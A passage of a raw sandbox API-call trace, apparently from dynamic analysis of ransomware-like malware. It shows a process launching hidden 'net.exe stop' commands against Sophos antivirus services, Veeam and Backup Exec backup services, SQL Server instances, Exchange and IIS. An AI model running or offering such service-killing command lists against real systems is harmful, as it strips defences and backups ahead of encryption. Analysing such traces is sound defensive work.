lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4f8, hWritePipe=0x616ef94*=0x3e0) returned 1 [0111.681] GetCurrentProcess () returned 0xffffffff [0111.681] GetCurrentProcess () returned 0xffffffff [0111.681] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x2c4) returned 1 [0111.681] CloseHandle (hObject=0x4f8) returned 1 [0111.681] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.681] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0111.681] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0111.681] CoTaskMemFree (pv=0x741d20) [0111.681] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos File Scanner Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24c20c0 | out: lpCommandLine="\"net.exe\" stop “Sophos File Scanner Service” /y", lpProcessInformation=0x24c20c0*(hProcess=0x468, hThread=0x4f8, dwProcessId=0x11cc, dwThreadId=0x11d0)) returned 1 [0111.693] CloseHandle (hObject=0x3e0) returned 1 [0111.693] GetFileType (hFile=0x2c4) returned 0x3 [0111.693] CloseHandle (hObject=0x4f8) returned 1 [0112.602] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.602] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4f8, hWritePipe=0x616ef94*=0x3e0) returned 1 [0112.602] GetCurrentProcess () returned 0xffffffff [0112.602] GetCurrentProcess () returned 0xffffffff [0112.602] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4b0) returned 1 [0112.602] CloseHandle (hObject=0x4f8) returned 1 [0112.603] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.603] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.603] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.603] CoTaskMemFree (pv=0x741d20) [0112.603] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop ReportServer$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eedc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24d7554 | out: lpCommandLine="\"net.exe\" stop ReportServer$TPS /y", lpProcessInformation=0x24d7554*(hProcess=0x4a8, hThread=0x4f8, dwProcessId=0x12b8, dwThreadId=0x12bc)) returned 1 [0112.610] CloseHandle (hObject=0x3e0) returned 1 [0112.611] GetFileType (hFile=0x4b0) returned 0x3 [0112.611] CloseHandle (hObject=0x4f8) returned 1 [0115.321] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.321] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4a4, hWritePipe=0x616ef94*=0x3e0) returned 1 [0115.321] GetCurrentProcess () returned 0xffffffff [0115.321] GetCurrentProcess () returned 0xffffffff [0115.321] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x448) returned 1 [0115.321] CloseHandle (hObject=0x4a4) returned 1 [0115.321] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.322] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.322] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.322] CoTaskMemFree (pv=0x741d20) [0115.322] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Veeam Backup Catalog Data Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eeb4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x22729cc | out: lpCommandLine="\"net.exe\" stop “Veeam Backup Catalog Data Service” /y", lpProcessInformation=0x22729cc*(hProcess=0x464, hThread=0x4a4, dwProcessId=0xf30, dwThreadId=0x824)) returned 1 [0115.527] CloseHandle (hObject=0x3e0) returned 1 [0115.527] GetFileType (hFile=0x448) returned 0x3 [0115.527] CloseHandle (hObject=0x4a4) returned 1 [0116.560] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0116.560] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x4a4, hWritePipe=0x616ef94*=0x3e0) returned 1 [0116.560] GetCurrentProcess () returned 0xffffffff [0116.560] GetCurrentProcess () returned 0xffffffff [0116.560] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4b0) returned 1 [0116.560] CloseHandle (hObject=0x4a4) returned 1 [0116.560] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0116.560] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0116.560] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0116.560] CoTaskMemFree (pv=0x741d20) [0116.561] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSOLAP$SYSTEM_BGC /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x267811c | out: lpCommandLine="\"net.exe\" stop MSOLAP$SYSTEM_BGC /y", lpProcessInformation=0x267811c*(hProcess=0x414, hThread=0x4a4, dwProcessId=0xc78, dwThreadId=0xbcc)) returned 1 [0117.362] CloseHandle (hObject=0x3e0) returned 1 [0117.367] GetFileType (hFile=0x4b0) returned 0x3 [0117.367] CloseHandle (hObject=0x4a4) returned 1 [0117.771] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.771] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.771] GetCurrentProcess () returned 0xffffffff [0117.771] GetCurrentProcess () returned 0xffffffff [0117.771] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x448) returned 1 [0117.771] CloseHandle (hObject=0x3e0) returned 1 [0117.771] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.771] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.771] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.771] CoTaskMemFree (pv=0x741d20) [0117.771] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop W3Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2272ef4 | out: lpCommandLine="\"net.exe\" stop W3Svc /y", lpProcessInformation=0x2272ef4*(hProcess=0x3f0, hThread=0x3e0, dwProcessId=0xc04, dwThreadId=0xb40)) returned 1 [0117.776] CloseHandle (hObject=0x478) returned 1 [0117.776] GetFileType (hFile=0x448) returned 0x3 [0117.776] CloseHandle (hObject=0x3e0) returned 1 [0117.776] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.776] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.776] GetCurrentProcess () returned 0xffffffff [0117.776] GetCurrentProcess () returned 0xffffffff [0117.776] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4e0) returned 1 [0117.776] CloseHandle (hObject=0x3e0) returned 1 [0117.776] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.776] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.776] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.777] CoTaskMemFree (pv=0x741d20) [0117.777] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSExchangeSRS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2670c78 | out: lpCommandLine="\"net.exe\" stop MSExchangeSRS /y", lpProcessInformation=0x2670c78*(hProcess=0x430, hThread=0x3e0, dwProcessId=0xe74, dwThreadId=0xe20)) returned 1 [0117.781] CloseHandle (hObject=0x478) returned 1 [0117.781] GetFileType (hFile=0x4e0) returned 0x3 [0117.781] CloseHandle (hObject=0x3e0) returned 1 [0117.781] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.781] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.782] GetCurrentProcess () returned 0xffffffff [0117.782] GetCurrentProcess () returned 0xffffffff [0117.782] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x418) returned 1 [0117.782] CloseHandle (hObject=0x3e0) returned 1 [0117.782] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.782] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.782] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.782] CoTaskMemFree (pv=0x741d20) [0117.782] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecAgentAccelerator /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x267459c | out: lpCommandLine="\"net.exe\" stop BackupExecAgentAccelerator /y", lpProcessInformation=0x267459c*(hProcess=0x47c, hThread=0x3e0, dwProcessId=0xea4, dwThreadId=0xe44)) returned 1 [0117.786] CloseHandle (hObject=0x478) returned 1 [0117.786] GetFileType (hFile=0x418) returned 0x3 [0117.786] CloseHandle (hObject=0x3e0) returned 1 [0117.786] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.786] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.786] GetCurrentProcess () returned 0xffffffff [0117.786] GetCurrentProcess () returned 0xffffffff [0117.786] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4a0) returned 1 [0117.786] CloseHandle (hObject=0x3e0) returned 1 [0117.786] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.786] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.787] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.787] CoTaskMemFree (pv=0x741d20) [0117.787] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$ECWDB2 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eee0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2677e68 | out: lpCommandLine="\"net.exe\" stop MSSQL$ECWDB2 /y", lpProcessInformation=0x2677e68*(hProcess=0x4a8, hThread=0x3e0, dwProcessId=0xa44, dwThreadId=0xd04)) returned 1 [0117.790] CloseHandle (hObject=0x478) returned 1 [0117.790] GetFileType (hFile=0x4a0) returned 0x3 [0117.791] CloseHandle (hObject=0x3e0) returned 1 [0117.791] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.791] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.791] GetCurrentProcess () returned 0xffffffff [0117.791] GetCurrentProcess () returned 0xffffffff [0117.791] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4c8) returned 1 [0117.791] CloseHandle (hObject=0x3e0) returned 1 [0117.791] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.791] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.791] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.791] CoTaskMemFree (pv=0x741d20) [0117.791] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop audioendpointbuilder /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x267b724 | out: lpCommandLine="\"net.exe\" stop audioendpointbuilder /y", lpProcessInformation=0x267b724*(hProcess=0x500, hThread=0x3e0, dwProcessId=0x644, dwThreadId=0xc74)) returned 1 [0117.795] CloseHandle (hObject=0x478) returned 1 [0117.795] GetFileType (hFile=0x4c8) returned 0x3 [0117.795] CloseHandle (hObject=0x3e0) returned 1 [0117.795] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.795] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.796] GetCurrentProcess () returned 0xffffffff [0117.796] GetCurrentProcess () returned 0xffffffff [0117.796] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x2c4) returned 1 [0117.796] CloseHandle (hObject=0x3e0) returned 1 [0117.796] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.796] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.796] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.796] CoTaskMemFree (pv=0x741d20) [0117.796] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos Safestore Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eec8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x267effc | out: lpCommandLine="\"net.exe\" stop “Sophos Safestore Service” /y", lpProcessInformation=0x267effc*(hProcess=0x4f8, hThread=0x3e0, dwProcessId=0x3b4, dwThreadId=0xd24)) returned 1 [0117.800] CloseHandle (hObject=0x478) returned 1 [0117.800] GetFileType (hFile=0x2c4) returned 0x3 [0117.800] CloseHandle (hObject=0x3e0) returned 1 [0117.800] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.800] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.800] GetCurrentProcess () returned 0xffffffff [0117.800] GetCurrentProcess () returned 0xffffffff [0117.800] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x504) returned 1 [0117.800] CloseHandle (hObject=0x3e0) returned 1 [0117.800] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.800] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.800] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.800] CoTaskMemFree (pv=0x741d20) [0117.801] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BackupExecAgentBrowser /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26828d8 | out: lpCommandLine="\"net.exe\" stop BackupExecAgentBrowser /y", lpProcessInformation=0x26828d8*(hProcess=0x514, hThread=0x3e0, dwProcessId=0xeb4, dwThreadId=0xd64)) returned 1 [0117.804] CloseHandle (hObject=0x478) returned 1 [0117.804] GetFileType (hFile=0x504) returned 0x3 [0117.805] CloseHandle (hObject=0x3e0) returned 1 [0117.805] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.805] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x3e0, hWritePipe=0x616ef94*=0x478) returned 1 [0117.805] GetCurrentProcess () returned 0xffffffff [0117.805] GetCurrentProcess () returned 0xffffffff [0117.805] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x4d0) returned 1 [0117.805] CloseHandle (hObject=0x3e0) returned 1 [0117.805] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.805] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.805] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.805] CoTaskMemFree (pv=0x741d20) [0117.805] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQL$PRACTICEMGT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eed8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26861a4 | out: lpCommandLine="\"net.exe\" stop MSSQL$PRACTICEMGT /y", lpProcessInformation=0x26861a4*(hProcess=0x520, hThread=0x518, dwProcessId=0xd48, dwThreadId=0xe7c)) returned 1 [0119.015] CloseHandle (hObject=0x478) returned 1 [0119.015] GetFileType (hFile=0x4d0) returned 0x3 [0119.015] CloseHandle (hObject=0x518) returned 1 [0120.701] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.701] CreatePipe (in: hReadPipe=0x616ef98, hWritePipe=0x616ef94, lpPipeAttributes=0x616ef18, nSize=0x0 | out: hReadPipe=0x616ef98*=0x518, hWritePipe=0x616ef94*=0x478) returned 1 [0120.701] GetCurrentProcess () returned 0xffffffff [0120.701] GetCurrentProcess () returned 0xffffffff [0120.701] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x616ef9c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x616ef9c*=0x554) returned 1 [0120.701] CloseHandle (hObject=0x518) returned 1 [0120.701] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.701] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0120.701] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0120.701] CoTaskMemFree (pv=0x741d20) [0120.701] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop “Sophos System Protection Service” /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x616eeb8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2689a84 | out: lpCommandLine="\"net.exe\" stop “Sophos System Protection Service” /y", 